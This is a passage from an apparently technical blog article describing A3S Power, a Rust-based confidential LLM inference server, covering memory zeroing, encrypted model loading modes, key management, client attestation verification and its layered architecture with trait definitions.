&lt;p&gt;A3S Power implements systematic memory zeroing via the &lt;code&gt;zeroize&lt;/code&gt; crate:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;SensitiveString&lt;/code&gt; wrapper&lt;/strong&gt;: All inference content (prompts, responses) is wrapped in &lt;code&gt;SensitiveString&lt;/code&gt;, which automatically zeroes memory on &lt;code&gt;Drop&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;zeroize_string()&lt;/code&gt; and &lt;code&gt;zeroize_bytes()&lt;/code&gt;&lt;/strong&gt;: Helper functions for manual zeroing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;Zeroizing&amp;lt;Vec&amp;lt;u8&amp;gt;&amp;gt;&lt;/code&gt;&lt;/strong&gt;: Decryption buffers for encrypted models use this wrapper; plaintext weights are zeroed immediately after use&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;&lt;code&gt;mlock()&lt;/code&gt; memory locking&lt;/strong&gt;: On Linux, decrypted model weights are locked in physical memory via &lt;code&gt;mlock()&lt;/code&gt;, preventing them from being swapped to disk. &lt;code&gt;munlock()&lt;/code&gt; is called on release&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Even if an attacker captures a memory snapshot after inference completes, they cannot recover the prompt, response, or model weights.&lt;/p&gt;

&lt;p&gt;Four leakage channels, four lines of defense. That prompt's privacy is now comprehensively protected.&lt;/p&gt;

&lt;p&gt;But there's one thing we haven't discussed — the model weights themselves.&lt;/p&gt;




&lt;h2&gt;
  
  
  7. Model Weights Are Also Confidential: Three Encrypted Loading Modes
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: Models Are Intellectual Property
&lt;/h3&gt;

&lt;p&gt;A carefully fine-tuned model may represent millions of dollars of investment and unique competitive advantage. If the model is stored in plaintext on disk, infrastructure operators can easily copy it.&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: AES-256-GCM Encrypted Models
&lt;/h3&gt;

&lt;p&gt;A3S Power supports AES-256-GCM encrypted model files (&lt;code&gt;.enc&lt;/code&gt; suffix). The encryption format is &lt;code&gt;[12-byte nonce][AES-256-GCM ciphertext+tag]&lt;/code&gt;. Three decryption modes address different security and performance needs.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mode one: DecryptedModel (file mode)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Decrypts ciphertext to a temporary &lt;code&gt;.dec&lt;/code&gt; file. Works with all backends. Performs secure erasure on &lt;code&gt;Drop&lt;/code&gt; — first overwrites file contents with zeros, then deletes the file.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Encrypted file → AES-256-GCM decryption → Temporary .dec file → Backend loads
                                                                    │
                                                              On Drop:
                                                              1. Zero-overwrite file
                                                              2. Delete file
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Mode two: MemoryDecryptedModel (memory mode)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Decrypts the entire model into &lt;code&gt;mlock&lt;/code&gt;-locked RAM; plaintext &lt;strong&gt;never touches disk&lt;/strong&gt;. On &lt;code&gt;Drop&lt;/code&gt;, memory is automatically zeroed via &lt;code&gt;Zeroizing&amp;lt;Vec&amp;lt;u8&amp;gt;&amp;gt;&lt;/code&gt;, then &lt;code&gt;munlock&lt;/code&gt; releases the lock.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Encrypted file → AES-256-GCM decryption → mlock-locked RAM → Backend loads
                                                                    │
                                                              On Drop:
                                                              1. Memory zeroing (zeroize)
                                                              2. munlock release
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This is the recommended choice in TEE mode (&lt;code&gt;in_memory_decrypt = true&lt;/code&gt;), because model plaintext never appears on disk — not even as a temporary file.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mode three: LayerStreamingDecryptedModel (streaming mode)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Designed specifically for the picolm backend. Decrypts the entire model once, then provides chunked access on demand. Each chunk is returned as &lt;code&gt;Zeroizing&amp;lt;Vec&amp;lt;u8&amp;gt;&amp;gt;&lt;/code&gt;, automatically zeroed after use.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Encrypted file → AES-256-GCM decryption → Chunked access interface
                                                    │
                                              picolm requests layer N:
                                              → Returns Zeroizing&amp;lt;Vec&amp;lt;u8&amp;gt;&amp;gt;
                                              → Forward pass
                                              → Chunk Drop → Memory zeroed
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This mode pairs perfectly with picolm's layer-streaming inference: at any moment, only one layer's plaintext weights exist in memory.&lt;/p&gt;

&lt;h3&gt;
  
  
  Key Management
&lt;/h3&gt;

&lt;p&gt;The &lt;code&gt;KeyProvider&lt;/code&gt; trait provides an extensible key management interface:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;KeyProvider&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;get_key&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;rotate_key&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;provider_name&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Two built-in implementations:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;StaticKeyProvider&lt;/strong&gt;: Loads key from file or environment variable, cached via &lt;code&gt;OnceCell&lt;/code&gt;. Suitable for single-key scenarios&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;RotatingKeyProvider&lt;/strong&gt;: Supports multiple keys, implements zero-downtime rotation via atomic index. &lt;code&gt;rotate_key()&lt;/code&gt; advances to the next key (cycling), &lt;code&gt;get_key()&lt;/code&gt; returns the current key&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Key sources support two forms:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight hcl"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Load from file (64 hex characters = 32 bytes)&lt;/span&gt;
&lt;span class="nx"&gt;model_key_source&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;file&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"/path/to/key.hex"&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;# Load from environment variable&lt;/span&gt;
&lt;span class="nx"&gt;model_key_source&lt;/span&gt; &lt;span class="err"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;env&lt;/span&gt; &lt;span class="p"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;"MY_MODEL_KEY"&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For production environments requiring HSM/KMS integration, a custom &lt;code&gt;KeyProvider&lt;/code&gt; can be implemented.&lt;/p&gt;

&lt;p&gt;At this point, that prompt's journey is nearly complete. Inference is done, and the response is returned to the trader through an encrypted channel. But before trusting this response, the client has one last thing to do.&lt;/p&gt;




&lt;h2&gt;
  
  
  8. How Can the Client Verify All of This Itself?
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: "Please Trust Us" Isn't Enough
&lt;/h3&gt;

&lt;p&gt;The server says it's running in a TEE, says it's doing log redaction, says it loaded the correct model. But these are all self-declarations from the server. Why should the client believe them?&lt;/p&gt;

&lt;h3&gt;
  
  
  How A3S Power Solves It: Independent Client Verification
&lt;/h3&gt;

&lt;p&gt;A3S Power's security model isn't "please trust us" — it's "please verify yourself." The client independently verifies every security claim the server makes through the &lt;code&gt;a3s-power-verify&lt;/code&gt; CLI or Verify SDK.&lt;/p&gt;

&lt;p&gt;The complete chain of trust looks like this:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;AMD/Intel Silicon (physical hardware — root of trust)
    │
    ├── Secure Processor (PSP / SGX)
    │   └── Manages AES encryption keys for each VM
    │
    ├── Hardware Root Key (ARK / Intel Root CA)
    │   └── Intermediate certificate (ASK / PCK CA)
    │       └── Chip-level certificate (VCEK / PCK)
    │           └── Attestation report signature
    │
    └── Platform Measurement
        └── Hash of code at boot time
            └── Proves runtime environment hasn't been tampered with
                │
                ├── report_data[0..32] = nonce (prevents replay)
                └── report_data[32..64] = model_sha256 (model identity)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;verify_report()&lt;/code&gt; function performs four-step verification, each an independent security check:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step one: Nonce binding verification.&lt;/strong&gt; Checks whether &lt;code&gt;report_data[0..32]&lt;/code&gt; equals the nonce the client sent. Prevents replay attacks — an attacker cannot use an old attestation report to impersonate the current TEE environment. Verification uses constant-time comparison to prevent timing side channels.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step two: Model hash binding verification.&lt;/strong&gt; Checks whether &lt;code&gt;report_data[32..64]&lt;/code&gt; equals the expected model SHA-256 hash. Proves the server is running the model you expect — not a smaller substitute, not a backdoored version.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step three: Platform measurement verification.&lt;/strong&gt; Checks whether &lt;code&gt;measurement&lt;/code&gt; (48-byte SHA-384) equals a known-good value. Proves the TEE environment's boot code (firmware, kernel, application) hasn't been tampered with.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step four: Hardware signature verification.&lt;/strong&gt; Verifies the attestation report's signature via the &lt;code&gt;HardwareVerifier&lt;/code&gt; trait:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;AMD SEV-SNP&lt;/strong&gt;: Fetches VCEK certificate from AMD KDS, verifies ECDSA P-384 signature. Certificate chain: ARK → ASK → VCEK → report signature&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Intel TDX&lt;/strong&gt;: Fetches PCK certificate from Intel PCS, verifies ECDSA P-256 signature. Certificate chain: Intel Root CA → PCK CA → PCK → report signature&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Certificate cache has a 1-hour TTL to avoid frequent requests being rate-limited by AMD KDS.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;VerifyOptions&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nv"&gt;'a&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;expected_model_hash&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;expected_measurement&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;Vec&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="n"&gt;hardware_verifier&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&amp;amp;&lt;/span&gt;&lt;span class="nv"&gt;'a&lt;/span&gt; &lt;span class="k"&gt;dyn&lt;/span&gt; &lt;span class="n"&gt;HardwareVerifier&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The combination of four-step verification means: the client can independently confirm the inference server's identity, runtime environment, and model identity without trusting any intermediary.&lt;/p&gt;

&lt;p&gt;That prompt's journey ends here. From the hardware attestation in the TLS handshake, to TEE memory encryption, to model identity verification, to layer-streaming inference, to log redaction and memory zeroing, to independent client verification — every step has cryptographic guarantees, depending on no one's promises.&lt;/p&gt;

&lt;p&gt;Now let's step back and look at the architecture supporting all of this.&lt;/p&gt;




&lt;h2&gt;
  
  
  9. Six-Layer Architecture: What's Inside
&lt;/h2&gt;

&lt;p&gt;A3S Power is written in Rust. The entire system consists of six layers, each with clear responsibilities, communicating with adjacent layers through trait interfaces.&lt;/p&gt;

&lt;h3&gt;
  
  
  Layer Topology
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;┌─────────────────────────────────────────────────────────────────────┐
│  API Layer                                                          │
│  /v1/chat/completions · /v1/completions · /v1/embeddings            │
│  /v1/models · /v1/attestation · /health · /metrics                  │
├─────────────────────────────────────────────────────────────────────┤
│  Server Layer                                                       │
│  RateLimiter → RequestID → Metrics → Tracing → CORS → Auth         │
│  AppState · Audit (JSONL/Encrypted/Async/Noop) · Transport          │
├─────────────────────────────────────────────────────────────────────┤
│  Backend Layer                                                      │
│  BackendRegistry (priority routing, TEE-aware)                      │
│  ┌─────────────────┬─────────────────┬────────────────┐             │
│  │ MistralRs ★     │ LlamaCpp        │ Picolm         │             │
│  │ Pure Rust(candle│ C++ bindings    │ Pure Rust      │             │
│  │ GGUF/SafeTensors│ GGUF            │ O(layer_size)  │             │
│  └─────────────────┴─────────────────┴────────────────┘             │
├─────────────────────────────────────────────────────────────────────┤
│  Model Layer                                                        │
│  ModelRegistry · BlobStorage (SHA-256) · GgufMeta · HfPull          │
├─────────────────────────────────────────────────────────────────────┤
│  TEE Layer (cross-cutting security layer)                           │
│  Attestation · EncryptedModel · Privacy · ModelSeal · KeyProvider   │
│  TeePolicy · EPC Detection · RA-TLS Certificate                    │
├─────────────────────────────────────────────────────────────────────┤
│  Verify Layer (client SDK)                                          │
│  verify_report() · HardwareVerifier (AMD KDS / Intel PCS)           │
└─────────────────────────────────────────────────────────────────────┘
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  What Each Layer Does
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;API Layer&lt;/strong&gt; — Provides OpenAI-compatible HTTP endpoints: &lt;code&gt;/v1/chat/completions&lt;/code&gt;, &lt;code&gt;/v1/completions&lt;/code&gt;, &lt;code&gt;/v1/embeddings&lt;/code&gt;, &lt;code&gt;/v1/models&lt;/code&gt;. Plus A3S Power's unique &lt;code&gt;/v1/attestation&lt;/code&gt; endpoint. The &lt;code&gt;autoload&lt;/code&gt; module implements automatic model loading, LRU eviction, decryption, and integrity verification.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Server Layer&lt;/strong&gt; — Manages the middleware stack (rate limiting, request ID, metrics, tracing, CORS, authentication), application state (&lt;code&gt;AppState&lt;/code&gt;), audit logging, and transport protocols (TCP/TLS/Vsock). &lt;code&gt;AppState&lt;/code&gt; is the core state container, holding references to all key components: model registry, backend registry, TEE provider, privacy provider, etc.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Backend Layer&lt;/strong&gt; — The abstraction layer for inference engines, and the key to A3S Power's architectural flexibility. &lt;code&gt;BackendRegistry&lt;/code&gt; automatically selects the optimal backend based on priority, model format, and hardware conditions. Three built-in backends cover the complete hardware spectrum: picolm (pure Rust layer-streaming, 256MB edge devices), mistralrs (pure Rust candle, standard servers, default), llama.cpp (C++ bindings, GPU acceleration). The &lt;code&gt;Backend&lt;/code&gt; trait is open — you can plug in any inference framework and immediately gain all of A3S Power's security capabilities.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Model Layer&lt;/strong&gt; — Manages model storage, registration, and pulling. &lt;code&gt;BlobStorage&lt;/code&gt; uses SHA-256 content-addressed storage with automatic deduplication. &lt;code&gt;ModelRegistry&lt;/code&gt; manages model manifests via &lt;code&gt;RwLock&amp;lt;HashMap&amp;gt;&lt;/code&gt; with JSON persistence. &lt;code&gt;HfPull&lt;/code&gt; supports pulling models from HuggingFace Hub with resume support and SSE progress streaming.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;TEE Layer&lt;/strong&gt; — The core differentiating layer, cross-cutting all other layers. Contains attestation, encrypted model loading (EncryptedModel), privacy protection (Privacy), model integrity (ModelSeal), key management (KeyProvider), policy engine (TeePolicy), EPC memory detection, and RA-TLS certificate management.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Verify Layer&lt;/strong&gt; — Client SDK for independently verifying server attestation reports. Includes nonce binding verification, model hash binding verification, platform measurement verification, and hardware signature verification (AMD KDS / Intel PCS certificate chain).&lt;/p&gt;

&lt;h3&gt;
  
  
  Minimal Core + External Extensions
&lt;/h3&gt;

&lt;p&gt;The trustworthiness of a security system is inversely proportional to its complexity. More code means more vulnerabilities and harder auditing. A3S Power minimizes the amount of code that must be trusted:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Core (7)                              Extensions (8 traits)
─────────────────────────             ──────────────────────────────────────
AppState (model lifecycle)            Backend: MistralRs / LlamaCpp / Picolm
BackendRegistry + Backend trait       TeeProvider: SEV-SNP / TDX / Simulated
ModelRegistry + ModelManifest         PrivacyProvider: redaction policy
PowerConfig (HCL)                     TeePolicy: allowlist + measurement binding
PowerError (14 variants → HTTP)       KeyProvider: Static / Rotating / KMS
Router + middleware stack             AuthProvider: API Key (SHA-256)
RequestContext (per-request context)  AuditLogger: JSONL / Encrypted / Async / Noop
                                      HardwareVerifier: AMD KDS / Intel PCS
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Core components are stable and non-replaceable; extension components are trait-based and independently replaceable. All extensions have default implementations — works out of the box, customization is optional.&lt;/p&gt;

&lt;p&gt;Here are a few key trait definitions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight rust"&gt;&lt;code&gt;&lt;span class="c1"&gt;// TEE hardware abstraction&lt;/span&gt;
&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;TeeProvider&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;attestation_report&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;nonce&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Option&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&amp;amp;&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nb"&gt;u8&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;Result&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="n"&gt;AttestationReport&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;is_tee_environment&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;tee_type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;TeeType&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Privacy protection policy&lt;/span&gt;
&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;PrivacyProvider&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;should_redact&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;sanitize_log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;msg&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;sanitize_error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;should_suppress_token_metrics&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Inference backend&lt;/span&gt;
&lt;span class="k"&gt;pub&lt;/span&gt; &lt;span class="k"&gt;trait&lt;/span&gt; &lt;span class="n"&gt;Backend&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;Send&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;Sync&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;name&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;fn&lt;/span&gt; &lt;span class="nf"&gt;supports&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="k"&gt;self&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;ModelFormat&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;bool&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
